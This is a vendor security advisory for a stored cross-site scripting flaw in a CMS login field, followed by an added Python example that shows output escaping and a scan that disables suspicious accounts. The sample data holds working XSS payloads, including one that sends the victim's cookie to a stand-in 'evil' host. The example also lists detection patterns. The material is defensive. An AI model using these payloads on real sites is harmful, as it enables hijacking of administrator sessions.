This Security Update fixes a stored cross-site scripting (XSS) vulnerability. An attacker could enter JavaScript in the login field (username) of their own account when registering as a new user. If an administrator later edited that user object, the stored script would execute in the administrator's browser, with the administrator's permission level. The vulnerability affects sites where untrusted users can create user accounts (self-registration).

The Security Update ensures that script commands cannot be entered in the login field when registering, and that commands already stored in existing accounts are not executed when an administrator edits the user object. We strongly recommend that you install this Security Update as soon as possible.

If your web site has a template override for design/standard/templates/content/datatype/edit/ezuser.tpl, please note that it is mandatory to apply the "wash" template operator to "{$attribute.content.login}", i.e. it should read "{$attribute.content.login|wash()}". An override that still outputs the raw login leaves the administrator's edit form exposed regardless of the update.
Additionally, a new command line script is included:

update/common/scripts/4.7/disablesuspicioususers.php

This script can list and disable all accounts whose login contains the kind of content an attacker would use, when run like this:

php update/common/scripts/4.7/disablesuspicioususers.php --disable

It can also be run without the --disable parameter. In this case it only outputs the list of affected user accounts, which lets you review the matches before disabling anything:

php update/common/scripts/4.7/disablesuspicioususers.php
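The following is an added example, not code from eZ Publish or from disablesuspicioususers.php, illustrating both halves of the fix described above: how an attacker-controlled login reaches an administrator's edit form unescaped versus HTML-escaped (the role the wash() operator plays in ezuser.tpl), and a triage scan over user records that flags logins carrying markup or script indicators, in the spirit of running the script first without --disable and then with it. The user record layout, the sample accounts, the indicator patterns and the function names are this example's own assumptions; the real script's heuristics are not documented on this page.

```python
"""Added example (not eZ Publish's own code): stored XSS via the user login
field, shown as (1) output encoding of the login in an edit form and
(2) a scan that flags and disables accounts with injected-looking logins.
Record layout and heuristics are assumptions made for this example."""
import html
import re

# Indicators an attacker needs in a login to get script execution when the
# value is echoed into HTML without escaping. Heuristic, assumed here.
SUSPICIOUS_PATTERNS = [
    re.compile(r"<\s*/?\s*[a-z]", re.I),   # start of any HTML tag, e.g. <script or </b
    re.compile(r"javascript\s*:", re.I),   # javascript: URL scheme
    re.compile(r"on[a-z]+\s*=", re.I),     # inline event handler such as onfocus=
    re.compile(r"&#x?[0-9a-f]+;?", re.I),  # numeric entities used for obfuscation
]


def render_login_field(login: str, wash: bool) -> str:
    """Return the <input> an admin edit form would contain for this login.

    wash=False mirrors the vulnerable template: the attacker-controlled
    login is interpolated raw into the attribute.  wash=True mirrors the
    fix: the value is HTML-escaped (quotes included) before it reaches HTML.
    """
    value = html.escape(login, quote=True) if wash else login
    return f'<input type="text" name="login" value="{value}">'


def is_suspicious_login(login: str) -> bool:
    """True if the login carries markup or script indicators."""
    return any(p.search(login) for p in SUSPICIOUS_PATTERNS)


def find_suspicious_users(users):
    """List mode: return the records whose login looks like injected content."""
    return [u for u in users if is_suspicious_login(u["login"])]


def disable_suspicious_users(users):
    """Disable mode: return a copy of the records with suspicious accounts
    disabled. Other accounts and the input list are left untouched."""
    out = []
    for u in users:
        u = dict(u)
        if is_suspicious_login(u["login"]):
            u["enabled"] = False
        out.append(u)
    return out


# Constructed sample data standing in for a self-registration user table.
SAMPLE_USERS = [
    {"id": 10, "login": "alice", "enabled": True},
    {"id": 11, "login": "bob.smith", "enabled": True},
    {"id": 12, "login": '"><script>alert(document.cookie)</script>', "enabled": True},
    {"id": 13, "login": '" autofocus onfocus="fetch(\'//evil/\'+document.cookie)', "enabled": True},
    {"id": 14, "login": "o'neil", "enabled": True},
]

if __name__ == "__main__":
    bad = SAMPLE_USERS[2]["login"]
    print("unwashed:", render_login_field(bad, wash=False))
    print("washed:  ", render_login_field(bad, wash=True))
    for u in find_suspicious_users(SAMPLE_USERS):
        print("suspicious:", u["id"], repr(u["login"]))
```

Note that the second flagged login contains no angle brackets at all: it breaks out of the value="..." attribute with a quote and adds an event handler, which is why escaping must cover quotes (wash() in the template, html.escape(quote=True) here) and why a scan that only looks for "<script" would miss it.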
Patch
See GitHub for the patch.
Credits
Thanks to Serhey Dolgushev for the report!